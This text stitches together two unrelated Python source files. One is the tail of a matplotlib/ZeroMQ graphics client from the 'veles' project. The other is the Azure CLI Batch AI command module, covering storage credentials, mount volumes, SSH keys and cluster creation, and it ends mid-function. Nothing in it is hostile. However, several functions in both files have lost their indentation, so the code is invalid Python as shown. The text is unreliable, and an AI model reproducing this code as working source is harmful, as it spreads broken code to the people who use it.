                    root.common.dirs.cache, "plots/veles_%s.pdf" %
                    (now.strftime('%Y-%m-%d_%H:%M:%S')))
                self.debug("Saving figures to %s...", self._pdf_file_name)
                import matplotlib.backends.backend_pdf as backend_pdf
                self._pdf_pages = backend_pdf.PdfPages(self._pdf_file_name)
            self._pdf_units_served.add(plotter.id)
            if getattr(plotter, "clear_plot", False):
                # Plotter restarts its chain; remember it to skip stale pages.
                self._pdf_unit_chains.add(plotter.name)
            elif (plotter.name not in self._pdf_unit_chains or
                  getattr(plotter, "redraw_plot", False)):
                self._pdf_pages.savefig(figure)
    def _sigint_handler(self, sign, frame):
        """SIGINT handler: shut down gracefully, then chain to the
        previously-installed handler.
        """
        self.shutdown()
        try:
            self._sigint_initial(sign, frame)
        except KeyboardInterrupt:
            self.critical("KeyboardInterrupt")

            def stop():
                # Reactor may have already stopped during shutdown().
                try:
                    reactor.stop()
                except ReactorNotRunning:
                    pass

            reactor.callWhenRunning(stop)
def _sigusr2_handler(self, sign, frame):
self.info("Activated PDF mode...")
self._pdf_trigger = True
def main():
    """Parse command line arguments and run the graphics client."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-b", "--backend", nargs='?',
                        default=root.common.graphics.matplotlib.backend,
                        help="Matplotlib drawing backend. \"no\" value disable"
                             "s any real plotting (useful with --dump).")
    parser.add_argument("-e", "--endpoint", required=True,
                        help="ZeroMQ endpoint to receive updates from.")
    # Fixed: help text was a copy-paste of --backend's description.
    parser.add_argument("--webagg-discovery-fifo", nargs='?',
                        default=None,
                        help="Path to a FIFO into which the chosen WebAgg "
                             "port will be written.")
    LOG_LEVEL_MAP = {"debug": logging.DEBUG, "info": logging.INFO,
                     "warning": logging.WARNING, "error": logging.ERROR}
    parser.add_argument("-v", "--verbose", type=str, default="info",
                        choices=LOG_LEVEL_MAP.keys(),
                        help="set verbosity level [default: %(default)s]")
    parser.add_argument("-d", "--dump", type=str, default="",
                        help="Dump incoming messages to this directory.")
    cmdargs = parser.parse_args()
    log_level = LOG_LEVEL_MAP[cmdargs.verbose]
    Logger.setup_logging(level=log_level)
    if log_level == logging.DEBUG:
        setup_pickle_debug()
    client = GraphicsClient(cmdargs.backend, cmdargs.endpoint,
                            webagg_fifo=cmdargs.webagg_discovery_fifo,
                            dump_dir=cmdargs.dump)
    if log_level == logging.DEBUG:
        client.debug("Activated pickle debugging")
    if cmdargs.backend == "WebAgg":
        # WebAgg owns the calling thread via pp.show(), so the client runs
        # in a worker thread while the Twisted reactor runs here.
        client_thread = threading.Thread(target=client.run)
        client_thread.start()
        reactor.run()
        client_thread.join()
    else:
        client.run()
# Run the CLI entry point only when executed as a script.
if __name__ == "__main__":
    main()
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=too-many-lines
from __future__ import print_function
import collections
import copy
import datetime
import json
import os
import signal
import socket
import string
import sys
import threading
import time
from functools import partial
from random import shuffle
import paramiko
import requests
from knack.log import get_logger
from knack.util import CLIError
from msrest.serialization import Deserializer
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from six.moves import urllib_parse
from azure.cli.core import keys
from azure.cli.core.util import get_default_admin_username
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.profiles import ResourceType, get_sdk
import azure.mgmt.batchai.models as models
# Environment variables for specifying azure storage account and key. We want the user to make explicit
# decision about which storage account to use instead of using his default account specified via AZURE_STORAGE_ACCOUNT
# and AZURE_STORAGE_KEY.
# Names of the environment variables carrying the storage account and key.
AZURE_BATCHAI_STORAGE_ACCOUNT = 'AZURE_BATCHAI_STORAGE_ACCOUNT'
AZURE_BATCHAI_STORAGE_KEY = 'AZURE_BATCHAI_STORAGE_KEY'
# User-facing messages shown when storage configuration is missing.
MSG_CONFIGURE_STORAGE_ACCOUNT = 'Please configure Azure Storage account name via AZURE_BATCHAI_STORAGE_ACCOUNT or ' \
                                'provide storage_account value in batchai section of your az configuration file.'
MSG_CONFIGURE_STORAGE_KEY = 'Please configure Azure Storage account key via AZURE_BATCHAI_STORAGE_KEY or ' \
                            'provide storage_key value in batchai section of your az configuration file.'
# Output directory id under which jobs report their stdout/stderr.
STANDARD_OUTPUT_DIRECTORY_ID = 'stdouterr'
# Parameters of auto storage
AUTO_STORAGE_RESOURCE_GROUP = 'batchaiautostorage'
AUTO_STORAGE_CONTAINER_NAME = 'batchaicontainer'
AUTO_STORAGE_SHARE_NAME = 'batchaishare'
AUTO_STORAGE_ACCOUNT_PREFIX = 'bai'
AUTO_STORAGE_CONTAINER_PATH = 'autobfs'
AUTO_STORAGE_SHARE_PATH = 'autoafs'
# Placeholders which customer may use in his config file for cluster creation.
AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_KEY)
AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_ACCOUNT)
# Default expiration time for file download URLs.
DEFAULT_URL_EXPIRY_MIN = 60
# Supported images.
SUPPORTED_IMAGE_ALIASES = {
    "UbuntuLTS": models.ImageReference(
        publisher='Canonical',
        offer='UbuntuServer',
        sku='16.04-LTS'
    ),
    "UbuntuDSVM": models.ImageReference(
        publisher='microsoft-ads',
        offer='linux-data-science-vm-ubuntu',
        sku='linuxdsvmubuntu'
    )
}
# Type of entries reported by list startup files.
LogFile = collections.namedtuple('LogFile', 'name download_url is_directory size')
# Module-level logger for this command module.
logger = get_logger(__name__)
def _get_resource_group_location(cli_ctx, resource_group):
    """Return the Azure location of the given resource group."""
    resources = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    group = resources.resource_groups.get(resource_group)
    return group.location
def _get_workspace_location(client, resource_group, workspace_name):
workspace = client.workspaces.get(resource_group, workspace_name)
return workspace.location
def _get_default_ssh_public_key_location():
path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub')
if os.path.exists(path):
return path
return None
def _get_deserializer():
    """Build a msrest Deserializer aware of every batchai model class."""
    client_models = dict(
        (name, cls) for name, cls in models.__dict__.items()
        if isinstance(cls, type))
    return Deserializer(client_models)
def _ensure_resource_not_exist(client, resource_group, workspace, name):
    """Raise CLIError when the resource already exists.

    :param client: resource-specific client exposing a ``get`` method.
    :param str resource_group: resource group name.
    :param str workspace: workspace name.
    :param str name: resource name.
    :raise CLIError: if ``get`` succeeds (resource exists).
    """
    try:
        client.get(resource_group, workspace, name)
        # Fixed message: it previously labeled the workspace as a second
        # "resource group" and swapped the arguments.
        raise CLIError('"{0}" already exists in "{1}" workspace under "{2}" resource group.'.format(
            name, workspace, resource_group))
    except CloudError as e:
        # 404 means the name is free; anything else is a real failure.
        if e.status_code != 404:
            raise
def _ensure_job_not_exist(client, resource_group, workspace, experiment, name):
    """Raise CLIError when a job with the given coordinates already exists."""
    try:
        client.get(resource_group, workspace, experiment, name)
    except CloudError as e:
        # 404 means the job name is free; anything else is a real failure.
        if e.status_code != 404:
            raise
        return
    raise CLIError('A job with given name, experiment, workspace and resource group already exists.')
def _ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name):
    """Validates the subnet id and its compatibility with the mounted NFS.

    :param client: Batch AI management client.
    :param str or None subnet: subnet resource id provided on the command line.
    :param str nfs_resource_group: resource group of the NFS to mount.
    :param str nfs_workspace: workspace of the NFS to mount.
    :param str nfs_name: name of the NFS to mount.
    :raise CLIError: when the subnet id is ill-formed or conflicts with the NFS.
    """
    if not subnet:
        return
    if not is_valid_resource_id(subnet):
        raise CLIError('Ill-formed subnet resource id')
    # check there are no conflicts between provided subnet and mounted nfs
    if not nfs_name:
        return
    nfs = None  # type: models.FileServer
    try:
        nfs = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
    except CloudError as e:
        # 404 is tolerated here; other failures propagate.
        if e.status_code != 404:
            raise
    if not nfs:
        # CLI will return the error during nfs validation
        return
    if nfs.subnet.id != subnet:
        raise CLIError('Cluster and mounted NFS must be in the same subnet.')
def _get_storage_management_client(cli_ctx):
    """Create a storage management client for the current CLI context."""
    # Imported lazily to keep module import time low.
    from azure.mgmt.storage import StorageManagementClient
    return get_mgmt_service_client(cli_ctx, StorageManagementClient)
def _get_storage_account_key(cli_ctx, account_name, account_key):
"""Returns account key for the given storage account.
:param str account_name: storage account name.
:param str or None account_key: account key provide as command line argument.
"""
if account_key:
return account_key
storage_client = _get_storage_management_client(cli_ctx)
account = [a.id for a in list(storage_client.storage_accounts.list()) if a.name == account_name]
if not account:
raise CLIError('Cannot find "{0}" storage account.'.format(account_name))
resource_group = parse_resource_id(account[0])['resource_group']
keys_list_result = storage_client.storage_accounts.list_keys(resource_group, account_name)
if not keys_list_result or not keys_list_result.keys:
raise CLIError('Cannot find a key for "{0}" storage account.'.format(account_name))
return keys_list_result.keys[0].value
def _get_effective_storage_account_name_and_key(cli_ctx, account_name, account_key):
"""Returns storage account name and key to be used.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
"""
if account_name:
return account_name, _get_storage_account_key(cli_ctx, account_name, account_key) or ''
return cli_ctx.config.get('batchai', 'storage_account', ''), cli_ctx.config.get('batchai', 'storage_key', '')
def _get_account_name_from_azure_file_url(azure_file_url):
"""Extracts account name from Azure File URL
:param str azure_file_url: Azure File URL
:return str: account name
"""
if not azure_file_url:
raise CLIError('Azure File URL cannot absent or be empty')
o = urllib_parse.urlparse(azure_file_url)
try:
account, _ = o.netloc.split('.', 1)
return account
except ValueError:
raise CLIError('Ill-formed Azure File URL "{0}"'.format(azure_file_url))
def _get_effective_credentials(cli_ctx, existing_credentials, account_name):
    """Returns AzureStorageCredentialsInfo for the account.

    Reuses *existing_credentials* when they already carry an account key or
    a key secret reference; otherwise looks the key up via the storage
    management service.
    """
    if existing_credentials and (existing_credentials.account_key or
                                 existing_credentials.account_key_secret_reference):
        return existing_credentials
    looked_up_key = _get_storage_account_key(cli_ctx, account_name, account_key=None)
    return models.AzureStorageCredentialsInfo(account_key=looked_up_key)
def _patch_mount_volumes(cli_ctx, volumes, account_name=None, account_key=None):
    """Patches mount volumes by replacing placeholders and adding credentials information.

    :param models.MountVolumes or None volumes: mount volumes.
    :param str or None account_name: name of the storage account provided as command line argument.
    :param str or None account_key: storage account key provided as command line argument.
    :return models.ClusterCreateParameters: updated parameters.
    :raise CLIError: when a placeholder was used but no storage account/key is configured.
    """
    if volumes is None:
        return None
    result = copy.deepcopy(volumes)  # type: models.MountVolumes
    storage_account_name, storage_account_key = _get_effective_storage_account_name_and_key(
        cli_ctx, account_name, account_key)
    # Only complain about missing configuration if a placeholder actually
    # required it (checked at the end).
    require_storage_account = False
    require_storage_account_key = False
    # Patch parameters of azure file share.
    if result.azure_file_shares:
        for ref in result.azure_file_shares:
            # Populate account name if it was not provided
            if not ref.account_name:
                ref.account_name = _get_account_name_from_azure_file_url(ref.azure_file_url)
            # Replace placeholders
            if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
                require_storage_account = True
                ref.account_name = storage_account_name
            if ref.azure_file_url and AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER in ref.azure_file_url:
                require_storage_account = True
                ref.azure_file_url = ref.azure_file_url.replace(
                    AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER, storage_account_name)
            if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
                require_storage_account_key = True
                ref.credentials.account_key = storage_account_key
            if not ref.credentials and ref.account_name == storage_account_name:
                require_storage_account_key = True
                ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
            if ref.account_name:
                # Fill in any still-missing key via the storage service.
                ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
    # Patch parameters of blob file systems.
    if result.azure_blob_file_systems:
        for ref in result.azure_blob_file_systems:
            # Replace placeholders
            if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
                require_storage_account = True
                ref.account_name = storage_account_name
            if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
                require_storage_account_key = True
                ref.credentials.account_key = storage_account_key
            if not ref.credentials and ref.account_name == storage_account_name:
                require_storage_account_key = True
                ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
            # Populate the rest of credentials based on the account name
            if not ref.account_name:
                raise CLIError('Ill-formed Azure Blob File System reference in the configuration file - no account '
                               'name provided.')
            if ref.account_name:
                ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
    if require_storage_account and not storage_account_name:
        raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
    if require_storage_account_key and not storage_account_key:
        raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
    return result
def _update_user_account_settings(params, admin_user_name, ssh_key, password):
    """Update account settings of cluster or file server creation parameters

    :param models.ClusterCreateParameters or models.FileServerCreateParameters params: params to update
    :param str or None admin_user_name: name of admin user to create.
    :param str or None ssh_key: ssh public key value or path to the file containing the key.
    :param str or None password: password.
    :return models.ClusterCreateParameters: updated parameters.
    :raise CLIError: when no user name is available, the key is invalid, or
        neither a key nor a password was provided.
    """
    result = copy.deepcopy(params)
    # Cluster parameters carry the settings directly; file server parameters
    # nest them under ssh_configuration.
    if hasattr(result, 'user_account_settings'):
        parent = result
    else:
        if result.ssh_configuration is None:
            result.ssh_configuration = models.SshConfiguration(user_account_settings=None)
        parent = result.ssh_configuration
    if parent.user_account_settings is None:
        parent.user_account_settings = models.UserAccountSettings(admin_user_name=None)
    # Get effective user name, password and key trying them in the following order: provided via command line,
    # provided in the config file, current user name and his default public ssh key.
    effective_user_name = admin_user_name or parent.user_account_settings.admin_user_name or get_default_admin_username()  # pylint: disable=line-too-long
    effective_password = password or parent.user_account_settings.admin_user_password
    # Use default ssh public key only if no password is configured.
    effective_key = (ssh_key or parent.user_account_settings.admin_user_ssh_public_key or
                     (None if effective_password else _get_default_ssh_public_key_location()))
    if effective_key:
        # The key may have been given as a path to a public key file.
        if os.path.exists(os.path.expanduser(effective_key)):
            with open(os.path.expanduser(effective_key)) as f:
                effective_key = f.read()
    try:
        if effective_key and not keys.is_valid_ssh_rsa_public_key(effective_key):
            raise CLIError('Incorrect ssh public key value.')
    except Exception:
        # Validation itself may blow up on malformed input.
        raise CLIError('Incorrect ssh public key value.')
    parent.user_account_settings.admin_user_name = effective_user_name
    parent.user_account_settings.admin_user_ssh_public_key = effective_key
    parent.user_account_settings.admin_user_password = effective_password
    if not parent.user_account_settings.admin_user_name:
        raise CLIError('Please provide admin user name.')
    if (not parent.user_account_settings.admin_user_ssh_public_key and
            not parent.user_account_settings.admin_user_password):
        raise CLIError('Please provide admin user password or ssh key.')
    return result
def _add_nfs_to_mount_volumes(volumes, file_server_id, mount_path):
    """Adds NFS to the mount volumes.

    :param models.MountVolumes or None volumes: existing mount volumes.
    :param str file_server_id: resource id of the file server.
    :param str mount_path: relative mount path for the file server.
    :return models.ClusterCreateParameters: updated parameters.
    """
    if not mount_path:
        raise CLIError('File server relative mount path cannot be empty.')
    result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
    if result.file_servers is None:
        result.file_servers = []
    reference = models.FileServerReference(
        relative_mount_path=mount_path,
        file_server=models.ResourceId(id=file_server_id),
        mount_options="rw")
    result.file_servers.append(reference)
    return result
def _get_azure_file_url(cli_ctx, account_name, azure_file_share):
"""Returns Azure File URL for the given account
:param str account_name: account name
:param str azure_file_share: name of the share
:return str: Azure File URL to be used in mount volumes
"""
return 'https://{0}.file.{1}/{2}'.format(account_name, cli_ctx.cloud.suffixes.storage_endpoint, azure_file_share)
def _add_azure_file_share_to_mount_volumes(cli_ctx, volumes, azure_file_share, mount_path, account_name=None,
                                           account_key=None):
    """Add Azure File share to the mount volumes.

    :param model.MountVolumes volumes: existing mount volumes.
    :param str azure_file_share: name of the azure file share.
    :param str mount_path: relative mount path for Azure File share.
    :param str or None account_name: storage account name provided as command line argument.
    :param str or None account_key: storage account key provided as command line argument.
    :return models.ClusterCreateParameters: updated parameters.
    """
    if not mount_path:
        raise CLIError('Azure File share relative mount path cannot be empty.')
    result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
    if result.azure_file_shares is None:
        result.azure_file_shares = []
    effective_account_name, effective_account_key = _get_effective_storage_account_name_and_key(
        cli_ctx, account_name, account_key)
    if not effective_account_name:
        raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
    if not effective_account_key:
        raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
    share_reference = models.AzureFileShareReference(
        relative_mount_path=mount_path,
        account_name=effective_account_name,
        azure_file_url=_get_azure_file_url(cli_ctx, effective_account_name, azure_file_share),
        credentials=models.AzureStorageCredentialsInfo(account_key=effective_account_key))
    result.azure_file_shares.append(share_reference)
    return result
def _add_azure_container_to_mount_volumes(cli_ctx, volumes, container_name, mount_path, account_name=None,
                                          account_key=None):
    """Add Azure Storage container to the mount volumes.

    :param model.MountVolumes: existing mount volumes.
    :param str container_name: container name.
    :param str mount_path: relative mount path for the container.
    :param str or None account_name: storage account name provided as command line argument.
    :param str or None account_key: storage account key provided as command line argument.
    :return models.ClusterCreateParameters: updated parameters.
    """
    if not mount_path:
        raise CLIError('Azure Storage Container relative mount path cannot be empty.')
    result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
    if result.azure_blob_file_systems is None:
        result.azure_blob_file_systems = []
    storage_account_name, storage_account_key = _get_effective_storage_account_name_and_key(
        cli_ctx, account_name, account_key)
    if not storage_account_name:
        raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
    if not storage_account_key:
        raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
    container_reference = models.AzureBlobFileSystemReference(
        relative_mount_path=mount_path,
        account_name=storage_account_name,
        container_name=container_name,
        credentials=models.AzureStorageCredentialsInfo(account_key=storage_account_key))
    result.azure_blob_file_systems.append(container_reference)
    return result
def _get_image_reference(image, custom_image):
    """Returns image reference for the given image and custom image.

    :param str image or None: image alias or full spec.
    :param str custom_image or None: resource id of the custom image.
    :return models.ImageReference: reference for the VM configuration.
    :raise CLIError: if the image with given alias was not found.
    """
    if custom_image and not image:
        raise CLIError('You need to specify --image argument with information about the custom image')
    if custom_image and not is_valid_resource_id(custom_image):
        raise CLIError('Ill-formed custom image resource id')
    if ':' in image:
        # full image specification is provided
        try:
            publisher, offer, sku, version = image.split(':')
            if not publisher:
                raise CLIError('Image publisher must be provided in --image argument')
            if not offer:
                raise CLIError('Image offer must be provided in --image argument')
            if not sku:
                raise CLIError('Image sku must be provided in --image argument')
            return models.ImageReference(
                publisher=publisher,
                offer=offer,
                sku=sku,
                version=version or None,
                virtual_machine_image_id=custom_image
            )
        except ValueError:
            # image.split did not yield exactly four components.
            raise CLIError('--image must have format "publisher:offer:sku:version" or "publisher:offer:sku:"')
    # image alias is used
    reference = None
    for alias, value in SUPPORTED_IMAGE_ALIASES.items():
        # Alias matching is case-insensitive.
        if alias.lower() == image.lower():
            reference = value
    if not reference:
        raise CLIError('Unsupported image alias "{0}", supported aliases are {1}'.format(
            image, ', '.join(SUPPORTED_IMAGE_ALIASES.keys())))
    # Deep-copy so the shared alias table entry is never mutated.
    result = copy.deepcopy(reference)
    result.virtual_machine_image_id = custom_image
    return result
def _get_scale_settings(initial_count, min_count, max_count):
    """Returns scale settings for a cluster with given parameters

    :param int or None initial_count: initial number of nodes.
    :param int or None min_count: minimum number of nodes for auto-scaling.
    :param int or None max_count: maximum number of nodes for auto-scaling.
    :return models.ScaleSettings or None: None means "take from config file".
    :raise CLIError: on inconsistent combinations of the three counts.
    """
    if not initial_count and not min_count and not max_count:
        # Get from the config file
        return None
    if sum([1 if v is not None else 0 for v in (min_count, max_count)]) == 1:
        raise CLIError('You need to either provide both min and max node counts or not provide any of them')
    if min_count is not None and max_count is not None and min_count > max_count:
        raise CLIError('Maximum nodes count must be greater or equal to minimum nodes count')
    if min_count == max_count:
        # Both None (manual scale by initial_count) or a degenerate range —
        # either way manual scale settings apply.
        if min_count is None or initial_count == min_count:
            return models.ScaleSettings(
                manual=models.ManualScaleSettings(target_node_count=initial_count))
        if initial_count is None:
            return models.ScaleSettings(
                manual=models.ManualScaleSettings(target_node_count=min_count)
            )
    return models.ScaleSettings(
        auto_scale=models.AutoScaleSettings(
            minimum_node_count=min_count,
            maximum_node_count=max_count,
            initial_node_count=initial_count or 0))
def _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes):
    """Updates cluster's nodes information.

    :param models.ClusterCreateParameters params: cluster create parameters.
    :param str or None image: image.
    :param str or None custom_image: custom image resource id.
    :param str or None vm_size: VM size.
    :param str vm_priority: Priority.
    :param int or None target: initial number of nodes.
    :param int or None min_nodes: min number of nodes.
    :param int or None max_nodes: max number of nodes.
    :return models.ClusterCreateParameters: updated parameters.
    """
    updated = copy.deepcopy(params)
    if vm_size:
        updated.vm_size = vm_size
    if not updated.vm_size:
        raise CLIError('Please provide VM size')
    if vm_priority:
        updated.vm_priority = vm_priority
    if image or custom_image:
        updated.virtual_machine_configuration = models.VirtualMachineConfiguration(
            image_reference=_get_image_reference(image, custom_image))
    command_line_scale = _get_scale_settings(target, min_nodes, max_nodes)
    if command_line_scale:
        updated.scale_settings = command_line_scale
    scale_is_configured = updated.scale_settings and (
        updated.scale_settings.manual or updated.scale_settings.auto_scale)
    if not scale_is_configured:
        raise CLIError('Please provide scale setting for the cluster via command line or configuration file')
    return updated
def _get_auto_storage_resource_group():
    """Return the fixed resource group name used for auto-storage accounts."""
    return AUTO_STORAGE_RESOURCE_GROUP
def _configure_auto_storage(cli_ctx, location):
    """Configures auto storage account for the cluster

    Creates (or reuses) a dedicated resource group and storage account in
    the given location, and makes sure the well-known file share and blob
    container exist.

    :param str location: location for the auto-storage account.
    :return (str, str): a tuple with auto storage account name and key.
    """
    from azure.mgmt.resource.resources.models import ResourceGroup
    BlockBlobService, FileService = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
                                            'blob#BlockBlobService', 'file#FileService')
    resource_group = _get_auto_storage_resource_group()
    resource_client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    if resource_client.resource_groups.check_existence(resource_group):
        logger.warning('BatchAI will use existing %s resource group for auto-storage account',
                       resource_group)
    else:
        logger.warning('Creating %s resource group for auto-storage account', resource_group)
        resource_client.resource_groups.create_or_update(
            resource_group, ResourceGroup(location=location))
    storage_client = _get_storage_management_client(cli_ctx)
    account = None
    # Reuse an existing account in the same location when possible.
    for a in storage_client.storage_accounts.list_by_resource_group(resource_group):
        if a.primary_location == location.lower().replace(' ', ''):
            account = a.name
            logger.warning('Using existing %s storage account as an auto-storage account', account)
            break
    if account is None:
        account = _create_auto_storage_account(storage_client, resource_group, location)
        logger.warning('Created auto storage account %s', account)
    key = _get_storage_account_key(cli_ctx, account, None)
    # Ensure the default share and container exist (no-ops when present).
    file_service = FileService(account, key)
    file_service.create_share(AUTO_STORAGE_SHARE_NAME, fail_on_exist=False)
    blob_service = BlockBlobService(account, key)
    blob_service.create_container(AUTO_STORAGE_CONTAINER_NAME, fail_on_exist=False)
    return account, key
def _generate_auto_storage_account_name():
    """Generates unique name for auto storage account"""
    pool = list(string.ascii_lowercase * 12)
    shuffle(pool)
    random_suffix = ''.join(pool[:12])
    return AUTO_STORAGE_ACCOUNT_PREFIX + random_suffix
def _create_auto_storage_account(storage_client, resource_group, location):
    """Creates new auto storage account in the given resource group and location

    :param StorageManagementClient storage_client: storage client.
    :param str resource_group: name of the resource group.
    :param str location: location.
    :return str: name of the created storage account.
    """
    from azure.mgmt.storage.models import Kind, Sku, SkuName
    name = _generate_auto_storage_account_name()
    check = storage_client.storage_accounts.check_name_availability(name)
    while not check.name_available:
        name = _generate_auto_storage_account_name()
        # Fixed: previously the bool ``.name_available`` was assigned to
        # ``check``, so a second unavailable name crashed with
        # AttributeError on the next loop test.
        check = storage_client.storage_accounts.check_name_availability(name)
    storage_client.storage_accounts.create(resource_group, name, {
        'sku': Sku(name=SkuName.standard_lrs),
        'kind': Kind.storage,
        'location': location}).result()
    return name
def _add_setup_task(cmd_line, output, cluster):
    """Adds a setup task with given command line and output destination to the cluster.

    :param str cmd_line: node setup command line.
    :param str output: output destination.
    :param models.ClusterCreateParameters cluster: cluster creation parameters.
    :return models.ClusterCreateParameters: (copied) parameters with the task.
    """
    if cmd_line is None:
        # No setup task requested — return the parameters untouched.
        return cluster
    if output is None:
        raise CLIError('--setup-task requires providing of --setup-task-output')
    patched = copy.deepcopy(cluster)
    patched.node_setup = patched.node_setup or models.NodeSetup()
    patched.node_setup.setup_task = models.SetupTask(
        command_line=cmd_line,
        std_out_err_path_prefix=output,
        run_elevated=False)
    return patched
def _generate_ssh_keys():
    """Generates ssh keys pair under ~/.ssh (id_rsa / id_rsa.pub)."""
    ssh_dir = os.path.join(os.path.expanduser('~'), '.ssh')
    private_key_path = os.path.join(ssh_dir, 'id_rsa')
    public_key_path = os.path.join(ssh_dir, 'id_rsa.pub')
    keys.generate_ssh_keys(private_key_path, public_key_path)
    logger.warning('Attempted to find or generate SSH key files id_rsa and id_rsa.pub under ~/.ssh to allow SSH access '
                   'to the nodes. If using machines without permanent storage, back up your keys to a safe location.')
def list_workspaces(client, resource_group=None):
    """List Batch AI workspaces, optionally filtered by resource group."""
    if not resource_group:
        return client.list()
    return client.list_by_resource_group(resource_group)
def create_workspace(cmd, client, resource_group, workspace_name, location=None):
    """Create a workspace, defaulting its location to the resource group's."""
    effective_location = location or _get_resource_group_location(cmd.cli_ctx, resource_group)
    return client.create(resource_group, workspace_name, effective_location).result()
def create_experiment(client, resource_group, workspace_name, experiment_name):
    """Create an experiment in the given workspace and wait for completion."""
    poller = client.create(resource_group, workspace_name, experiment_name)
    return poller.result()
def _get_effective_resource_parameters(name_or_id, resource_group, workspace):
    """Returns effective resource group, workspace and name for the given resource

    Accepts either a bare name (combined with the supplied resource group and
    workspace) or a full ARM resource id.
    """
    if not name_or_id:
        return None, None, None
    if is_valid_resource_id(name_or_id):
        parts = parse_resource_id(name_or_id)
        # NOTE(review): assumes parse_resource_id exposes the workspace as
        # 'name' and the child resource as 'resource_name' for nested Batch AI
        # ids — confirm against msrestazure.tools.
        return parts['resource_group'], parts['name'], parts['resource_name']
    return resource_group, workspace, name_or_id
def create_cluster(cmd, client, # pylint: disable=too-many-locals
                   resource_group, workspace_name, cluster_name, json_file=None, user_name=None,
                   ssh_key=None, password=None, generate_ssh_keys=None, image=None, custom_image=None,
                   use_auto_storage=False, vm_size=None, vm_priority=None, target=None, min_nodes=None,
                   max_nodes=None, subnet=None, nfs=None, nfs_mount_path='nfs', azure_file_share=None,
                   afs_mount_path='afs', container_name=None, container_mount_path='bfs', account_name=None,
                   account_key=None, setup_task=None, setup_task_output=None):
    """Creates a cluster in the given workspace.

    Base configuration is read from json_file when provided and is then
    overridden/augmented by the explicit command line arguments: user account,
    node image/size/scale, mounted file systems (NFS, Azure File share, blob
    container, auto-storage), subnet and node setup task.
    """
    if generate_ssh_keys:
        _generate_ssh_keys()
        if ssh_key is None:
            # Use the key pair that _generate_ssh_keys found or created.
            ssh_key = _get_default_ssh_public_key_location()
    _ensure_resource_not_exist(client.clusters, resource_group, workspace_name, cluster_name)
    # The NFS may be given as a plain name (same group/workspace) or a full resource id.
    nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
        nfs, resource_group, workspace_name)
    _ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name)
    if json_file:
        with open(json_file) as f:
            json_obj = json.load(f)
            params = _get_deserializer()('ClusterCreateParameters', json_obj)
    else:
        # noinspection PyTypeChecker
        params = models.ClusterCreateParameters(vm_size=None, user_account_settings=None)
    if params.node_setup:
        # Fill in credentials for mount volumes that came from the config file.
        params.node_setup.mount_volumes = _patch_mount_volumes(
            cmd.cli_ctx, params.node_setup.mount_volumes, account_name, account_key)
    params = _update_user_account_settings(params, user_name, ssh_key, password)
    params = _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes)
    if nfs_name or azure_file_share or container_name:
        params.node_setup = params.node_setup or models.NodeSetup()
    mount_volumes = params.node_setup.mount_volumes if params.node_setup else None
    if nfs_name:
        file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
        mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
    if azure_file_share:
        mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
                                                               afs_mount_path, account_name, account_key)
    if container_name:
        mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
                                                              container_mount_path, account_name, account_key)
    if use_auto_storage:
        # Auto-storage mounts both a file share and a blob container from a
        # storage account in the workspace's region.
        auto_storage_account, auto_storage_key = _configure_auto_storage(
            cmd.cli_ctx, _get_workspace_location(client, resource_group, workspace_name))
        mount_volumes = _add_azure_file_share_to_mount_volumes(
            cmd.cli_ctx, mount_volumes, AUTO_STORAGE_SHARE_NAME, AUTO_STORAGE_SHARE_PATH,
            auto_storage_account, auto_storage_key)
        mount_volumes = _add_azure_container_to_mount_volumes(
            cmd.cli_ctx, mount_volumes, AUTO_STORAGE_CONTAINER_NAME, AUTO_STORAGE_CONTAINER_PATH,
            auto_storage_account, auto_storage_key)
    if mount_volumes:
        if params.node_setup is None:
